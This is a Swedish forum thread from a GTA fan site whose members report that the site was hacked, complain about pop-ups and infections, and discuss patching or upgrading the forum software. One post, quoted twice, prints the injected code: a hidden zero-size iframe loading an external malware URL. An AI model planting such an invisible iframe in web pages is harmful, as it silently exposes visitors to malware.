Jump to content

Trojans häst av gtasajten!


rabarben
 Share

Recommended Posts

Du har en poäng där.

Men reglerna som satts upp bör bara få ändras av Hultenius som äger stället.

Men att minst en till borde få 100% tillgång till forumet är viktigt (trotts det stora ansvaret som det innebär) det håller jag med om.

Men sedan att Hultenius inte skulle vara aktiv längre är bara båg.

Han är inte inne dagligen (vilket det inte finns en anledning till heller...) men han tittar ju till det regelbundet.

Ge killen en break, han behöver inte synas hela tiden. För tillfället går sajten och forumet på sparlåga i väntan på bättre tider. Vi kommer snart att få en stor uppsving på både nya medlemmar, info och nyheter.

PS3 releasen närmar sig med stormsteg och med den det nya GTA spelet/n.

Jag är säker på att han ordnar det till det bästa. Har helt förtroende för honom och tycker att han sköter det jätte bra.

Inga större katastrofer har inträffat och modsen gör ett förträffligt arbete. Helt gratis dessutom.

Stort tack och heder till KalleÄR, StellHell, Topp3, A.A och Azore som sköter stället så bra och gör så att forumet har blivt så familjärt.

Over and out...

Länk till kommentar
Dela på andra sidor

Stort tack och heder till KalleÄR, StellHell, Topp3, A.A och Azore som sköter stället så bra och gör så att forumet har blivt så familjärt.

Over and out...

Jag då? <_<

Det är förjävligt att något sånt här inträffar och förstör för forumet och dess medlemmar men förhoppningsvis dyker hultan upp snart och rättar till det. Som tur är verkar det som att virussidan som iframen länkar till har tagits bort.

Länk till kommentar
Dela på andra sidor

Jag då? <_<

Attan jag hade lite bråttom när jag skrev och missade dig. Ursäkta för det. Har inte haft så mycket kontakt med dig så det blir lätt att man glömmer dig men du gör inte mindre viktigt arbete.

Kommer inte glömma dig i fortsättningen.

Länk till kommentar
Dela på andra sidor

Nånting skumt verkar vara kvar. Detta får jag upp efter varje länk jag klickar här på sajten. Så tråkigt med folk som förstör för andra.

Typ 5'e gången jag skriver det men men.. Finns fortfarande kod kvar på sidan från trojanen

<iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe>

Den länkar vidare till den addressen du ser

Länk till kommentar
Dela på andra sidor

Typ 5'e gången jag skriver det men men.. Finns fortfarande kod kvar på sidan från trojanen

<iframe src="http://196.regvista.com/index.php?ref=wde" width="0" height="0" frameborder="0"></iframe>

Den länkar vidare till den addressen du ser

Lugn Gizzy, jag har inte kollat igenom trådarna bara. ^_^

Länk till kommentar
Dela på andra sidor

Jaha, nu får jag megaattacker från regvista i form av poppupps från GTAsajten, började för 5 minuter sedan och ploppar upp på varje ställe.

Som tur är har man en fungerande poppupp stoppare. Bara jag som märkt detta?

Redigerad av Jazz
Länk till kommentar
Dela på andra sidor

Jaha, nu får jag megaattacker från regvista i form av poppupps från GTAsajten, började för 5 minuter sedan och ploppar upp på varje ställe.

Som tur är har man en fungerande poppupp stoppare. Bara jag som märkt detta?

DU måste typ klicka in på den

MEN HUR får jag bort trojan hästen?

Länk till kommentar
Dela på andra sidor

Hultan Stellan har sökt dig i IRC och MSN han har skickat mail.

Men hur faen får jag bort hästeN? :lol:

Du ser hur bra uppdaterad jag är, ey? ^_^

irc och hultenius@gtasajten.com var ganska döfött om jag säger så. ^_^

Skönt att veta att du har fått reda på problemen nu iaf. Hoppas inte för många har blivigt smittade.

Länk till kommentar
Dela på andra sidor

Du ser hur bra uppdaterad jag är, ey? :rolleyes:

irc och hultenius@gtasajten.com var ganska döfött om jag säger så. :o

Skönt att veta att du har fått reda på problemen nu iaf. Hoppas inte för många har blivigt smittade.

Du var nog inte SÅ bra uppdaterad men du FÖRsökte iaf

Och jag är smittad med vet inte hur fan jag får bort de ;)

Länk till kommentar
Dela på andra sidor

Funderar just nu på vad som är bäst, att hårdkoda bort säkerhetsrisker i nuvarande version av IPB eller helt enkelt uppdatera till senaste IPB2. Lutar faktiskt mot det sista iom att det redan är bestämt att forumet ska uppdateras nångång och vi redan har en licens...

@iweX: Ladda ner valfritt antivirusprogram, tex från http://www.kaspersky.com/trials.

Länk till kommentar
Dela på andra sidor

Funderar just nu på vad som är bäst, att hårdkoda bort säkerhetsrisker i nuvarande version av IPB eller helt enkelt uppdatera till senaste IPB2. Lutar faktiskt mot det sista iom att det redan är bestämt att forumet ska uppdateras nångång och vi redan har en licens...

@iweX: Ladda ner valfritt antivirusprogram, tex från http://www.kaspersky.com/trials.

IBP2! IPB2! ;)

... Jag vill också ha virus! :rolleyes:

Länk till kommentar
Dela på andra sidor

...Men sedan att Hultenius inte skulle vara aktiv längre är bara båg.

Han är inte inne dagligen (vilket det inte finns en anledning till heller...) men han tittar ju till det regelbundet.

Ge killen en break, han behöver inte synas hela tiden...

:rolleyes:

Länk till kommentar
Dela på andra sidor

  • 7 months later...
Gäst
This topic is now closed to further replies.
 Share

×
×
  • Create New...